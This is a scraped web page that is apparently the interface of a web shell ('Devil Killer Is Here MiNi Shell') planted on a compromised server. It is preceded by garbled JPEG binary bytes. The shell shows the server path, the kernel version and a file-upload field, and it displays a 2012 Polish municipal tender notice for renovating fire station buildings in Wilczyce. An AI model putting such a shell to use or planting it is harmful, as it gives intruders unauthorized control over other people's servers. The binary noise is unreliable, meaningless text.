JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120723/265054-N-2012.html

<p class="kh_header"><b>Wilczyce: Remont budynku OSP w Pęczynach i adaptacja budynku OSP w Pielaszowie na potrzeby świetlic wiejskich wraz z wyposażeniem</b><br>
<b>Numer ogłoszenia: 265054 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilczyce , 174 174, 27-612 Wilczyce, woj. świętokrzyskie, tel. 015 8377275, faks 015 8377236.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku OSP w Pęczynach i adaptacja budynku OSP w Pielaszowie na potrzeby świetlic wiejskich wraz z wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane polegające na: Remont budynku OSP w Pęczynach i adaptacja budynku OSP w Pielaszowie na potrzeby świetlic wiejskich wraz z wyposażeniem zgodnie z przedmiarem robót oraz specyfikacją istotnych warunków zamówienia SIWZ. 1.1 Roboty remontowo - budowlane budynek remizy OSP w Pęczynach (wewnątrz budynku) 1) Wykonanie posadzki z płytek ceramicznych GRES podłogowych o wymiarach 30x30 w pokoju gospodarczym w ilości ok. 31,619m2. Płytki antypoślizgowe z odpowiednim certyfikatem. Kolor płytek przed położeniem metodą na klej należy bezwzględnie uzgodnić z Zamawiającym. Po położeniu płytek należy wykonać odpowiednią fugę. 2) Położenie cokolika z płytek GRES układanych metodą na klej - wysokość cokolika 15cm w pokoju gospodarczym w ilości ok. 18,120m2 3) Licowanie ścian płytkami na zaprawie klejowej, płytki o wymiarach 20x25 cm (wykonanie fartucha ochronnego w pomieszczeniu gospodarczym) - ok. 1,850m2 4) Roboty ziemne ręczne z przewozem gruntu taczkami na odległość do 10 m grunt kar. III ( wykop pod fundament komina w czytelni) - ok. 0,176m3 5) Wykonanie zbrojenia konstrukcji - przygotowanie i montaż zbrojenia elementów budynków i budowli prętami stalowymi okrągłymi żebrowanymi o średnicy 8 do 14mm - zbrojenie fundamentu pod komin w czytelni - ok. 0,007t 6) Wykonanie Ławy fundamentowe żelbetowe -prostokątne z betonu zwykłego B-20 , o szerokości do 0,6 m - ława pod komin w czytelni - ok. 0,176m3 7) Wymurowanie komina z cegieł budowlanych pełnych : wieloprzewodowe o przekroju 1/2x1/2 cegły ( w czytelni w poziomie przyziemia i ponad dachem) - komin 3 kanałowy 0,96x0,38m 8) Otynkowanie ręczne komina w czytelni- ok. 5,119m2 9) Malowanie jednokrotne gruntem ATLAS UNIGRUNT tynków wewnętrznych na ścianach i sufitach ( podkład pod farbę emulsyjną) - ok. 5,119m2 10) Malowanie dwukrotne farbami emulsyjnymi komina w czytelni- ok. 5,119m2 11) Zakup pieca węglowego do ogrzewania czytelni wraz z niezbędnym osprzętem i montażem 12) Wykonanie uzupełnienia płytek ceramicznych antypoślizgowych GRES w sali multimedialno - konferencyjnej w ilości ok. 3m2 .Uszkodzone płytki należy zdemontować, odczyścić miejsce na montaż nowej płytki , zastosować odpowiedni klej; kolor płytki musi być zgodny z kolorem płytek istniejących) 13) Umocowanie siatki tynkarskiej cięto -ciągnionej na ścianach, filarach, pilastrach - usunięcie pęknięć tynków w świetlicy - 2m2 14) Wypełnienie zaprawą cementową oczek siatki cięto ciągnionej , umocowanej na ścianach i stropach - usunięcie pęknięć tynków w świetlicy - pomalowanie uzupełnionych pęknięć tynków 15) Dwukrotne pomalowanie farbami emulsyjnymi pomieszczenia czytelni (ściany + sufit) - ok. 136,363m2. Starą farbę należy zeszpachlować ze ścian i sufitu, umyć ściany i sufit, zastosować odpowiedni podkład gruntujący przed przystąpieniem do malowania. Kolor farby należy bezwzględnie uzgodnić z Zamawiającym. 16) Roboty na zewnątrz budynku: wykonanie chodnika przed budynkiem remizy (świetlicy) Mechaniczne wykonanie koryt na całej szerokości jezdni i chodników w gruncie kategorii I-IV , o głębokości 20cm - ilość 40m2 ; wykonanie warstwy odsączającej z piasku - zagęszczenie ręczne - warstwa o grubości 10cm po zagęszczeniu - ilość 40m2; wykonanie podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8[cm] - ilość ok. 40m2; montaż obrzeży betonowych 20x6cm , na podsypce piaskowej z wypełnieniem spoin - ok. 44m; ułożenie chodnika z kostki brukowej gr. 60mm na podsypce piaskowej gr. 50mm z wypełnieniem spoin piaskiem -ilość 0,400/100m2 Wyposażenie - budynek remizy OSP w Pęczynach : 1) zakup atlasu wraz z montażem do ćwiczeń stacjonarnego z regulacją obciążenia dla ćwiczenia wyciskania, motylków o wymiarach ok. 212x166x230( wysokość x szerokość x długość), możliwość trenowania wszystkich partii mięśni; ławeczka skośna, poręcze, stanowisko do ćwiczeń nóg, modlitewnik - szt. 1; 2) zakup stołów konferencyjnych z blatem laminowanym z płyty wiórowej i nogach stalowych o wymiarach 200 x 90 x 80[cm] (szerokość x głębokość x wysokość) - szt. 2; 3) zakup krzeseł konferencyjnych tapicerowanych pokrytych tkaniną na nogach stalowych - szt. 16; 4) zakup zestawu komputerowego wyposażonego w myszkę optyczną , monitor LCD 21 cal, zestaw głośnikowy (2 szt. głośników min. 2W i jeden głośnik min. 5W), listwę zasilającą (5 gniazd), klawiaturę, komputer (twardy dysk min. 500GB, karta graficzna, procesor min. 2.5GHz, napęd DVD-+RW, obudowa, zasilacz min 400W, pamięć RAM min. 2GB, płyta główna, gwarancja 12 miesięcy - 1 kpl.) Oprogramowanie Windows 7; 5) zakup telewizora LCD - 32 cale, gwarancja 12 miesięcy, rozdzielczość 1366x768(HD Ready), moc wyjściowa audio (RMS) min. 2 x 5W, teletext (TTXT) Mega, MPEG-4, menu w języku polskim, automatyczne wyszukiwanie kanałów, automatyczne wyłączanie, napisy, zużycie energii: maks.95W wraz z uchwytem do mocowania na ścianę, anteną, kablem 30m i montażem - 1 szt. 1.2 Roboty remontowo - budowlane budynek remizy OSP w Pielaszowie (wewnątrz budynku) 1) Sala wystawowo - konferencyjno - multimedialna :Wykonanie posadzki z płytek ceramicznych GRES podłogowych, antypoślizgowych o wymiarach 30x30.Kolor płytek przed położeniem metodą na klej należy bezwzględnie uzgodnić z Zamawiającym. Po położeniu płytek należy wykonać odpowiednią fugę; wykonanie cokolika z płytek GRES o wys. cokolika 15cm, malowanie farbami emulsyjnymi ścian i sufitu, po uprzednim odczyszczeniu ścian ze starej farby. Przed malowaniem ściany i sufit należy zagruntować. Kolor farby należy uzgodnić z Zamawiającym przed przystąpieniem do prac malarskich. 2) Pomieszczenie gospodarcze - pomocnicze: wykonanie ścianki działowej z cegieł pełnych, o grubości ? cegły , wykonanie otworu na drzwi, wykucie gniazd dla osadzenia belek stalowych , montaż drzwi o odporności ogniowej EI60, wymiana kratki ściekowej 3) Pomieszczenie WC : wykonanie posadzki z płytek ceramicznych GRES układanych na klej metodą zwykłą o wym. 30x30, antypoślizgowych; kolor płytek przed położeniem metodą na klej należy bezwzględnie uzgodnić z Zamawiającym; położenie płytek na czterech ścianach w łazience, od poziomu podłogi do wysokości 1,50m 4) Sala komputerowa dla mieszkańców : Rozebranie ścianki z cegieł na zaprawie cementowo - wapiennej o grubości ścianki w cegłach ? cegły dzielącej salę z pomieszczeniem pomocniczym , wykonanie posadzki z płytek GRES 30x30 układanych metodą zwykłą na klej wraz z fugowaniem, wykonanie cokolika z płytek GRES o wysokości 15cm, malowanie farbami emulsyjnymi 5) Pomieszczenie pomocnicze - Wykonanie posadzki z płytek ceramicznych GRES podłogowych, antypoślizgowych o wymiarach 30x30.Kolor płytek przed położeniem metodą na klej należy bezwzględnie uzgodnić z Zamawiającym. Po położeniu płytek należy wykonać odpowiednią fugę; wykonanie cokolika z płytek GRES o wys. cokolika 15cm, malowanie farbami emulsyjnymi ścian i sufitu, zamurowanie otworu o objętości do 2m3. 6) Wymiana puszek podtynkowych o średnicy do 60mm, przy przekroju dołączanych przewodów: do 2,5mm2 - puszki 1-odgałęźne- 5sztuk 7) Wymiana gniazd wtyczkowych o natężeniu prądu do 16A, w obudowie uszczelnionej ze stykiem uziemiającym, na podłożu ceglanym - 2 biegunowych - 8 sztuk 8) Wymiana łączników na prąd o natężeniu do 10 A - wyłącznik klawiszowy 6 sztuk 9) Wymiana kratek wentylacyjnych z PCW 14x21cm - 3 sztuki 10) Malowanie dwukrotne farbą olejną, uprzednio malowanej stolarki okiennej o powierzchni ponad 1,0m2 , z uszczelnieniem szyb i okien oraz ewentualną wymianą pękniętych szyb i uzupełnieniem brakujących - pow. 32,223m2 Łączna powierzchnia płytek do położenia - 159,013m2; łączna ilość cokolika 15 cm do położenia 99,920m, łączna powierzchnia ścian i sufitów do malowania 737,638m2 Wyposażenie - budynek remizy OSP w Pielaszowie : 1) zakup stołów konferencyjnych z blatem laminowanym z płyty wiórowej i nogach stalowych o wymiarach 200 x 90 x 80[cm] (szerokość x głębokość x wysokość) - szt. 2; 2) zakup wraz z ewentualnym montażem krzeseł konferencyjnych tapicerowanych pokrytych tkaniną na nogach stalowych - szt. 16; 3) zakup zestawu komputerowego wyposażonego w myszkę optyczną , monitor LCD 21 cal, zestaw głośnikowy (2 szt. głośników min. 2W i jeden głośnik min. 5W), listwę zasilającą (5 gniazd), klawiaturę, komputer (twardy dysk min. 500GB, karta graficzna, procesor min. 2.5GHz, napęd DVD-+RW, obudowa, zasilacz min 400W, pamięć RAM min. 2GB, płyta główna, gwarancja 12 miesięcy - 1 kpl.) Oprogramowanie Windows 7; 4) zakup telewizora LCD - 32 cale, gwarancja 12 miesięcy, rozdzielczość 1366x768(HD Ready), moc wyjściowa audio (RMS) min. 2 x 5W, teletext (TTXT) Mega, MPEG-4, menu w języku polskim, automatyczne wyszukiwanie kanałów, automatyczne wyłączanie, napisy, zużycie energii: maks.95W wraz z uchwytem do mocowania na ścianę, anteną, kablem 30m i montażem - 1 szt. Materiały użyte do wykonania przedmiotowego zadania muszą być takie jak wymienione powyżej lub równoważne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo Zamówień Publicznych stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówień. 2. Podstawą do wszczęcia postępowania o udzielenia zamówienia uzupełniającego dotychczasowemu Wykonawcy w okresie 3 lat od udzielenia zamówienia podstawowego będzie decyzja Zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.30.00-7, 45.44.21.00-8, 45.45.00.00-6, 39.15.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 w/w ustawy PZP oraz że nie podlega wykluczeniu na podstawie art. 24ust. 1-2 w/w ustawy PZP. Wzór oświadczenia stanowi - załącznik nr 2 oświadczenie do SIWZ. 2. Zamawiający żąda następujących dokumentów: 1) podpisane przez osobę upoważnioną oświadczenie o zapoznaniu się z przedmiotowym budynkiem remizy zakresem prac, pozwoleniem na wykonanie przedmiotowych robót budowlanych ujętych w opisie technicznym opracowanym dla przedmiotowego zadania - załącznik nr 3 oświadczenie do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się istotne zmiany postanowień zawartej umowy o których mowa w art. 144 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych ( Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm. ) w stosunku do treści oferty Wykonawcy na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach: 1) zmiany wynagrodzenia w przypadku zmiany stawki podatku VAT, 2) zmiany terminu wykonania, w przypadku zaistnienia klęski żywiołowej: jak huragany, powodzie, bądź warunków atmosferycznych znacznie odbiegających od normy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wilczyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminy Wilczyce 
Wilczyce 174 
27-612 Wilczyce 
pok. nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 07:45, miejsce: Gminy Wilczyce 
Wilczyce 174 
27-612 Wilczyce 
pok. nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 413 Wdrażanie Lokalnych Strategii Rozwoju dla małych projektów tj. operacji, które nie odpowiadają warunkom przyznania pomocy w ramach działań osi 3 ale przyczyniają się do osiągnięcia celów tej osi - PROW na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com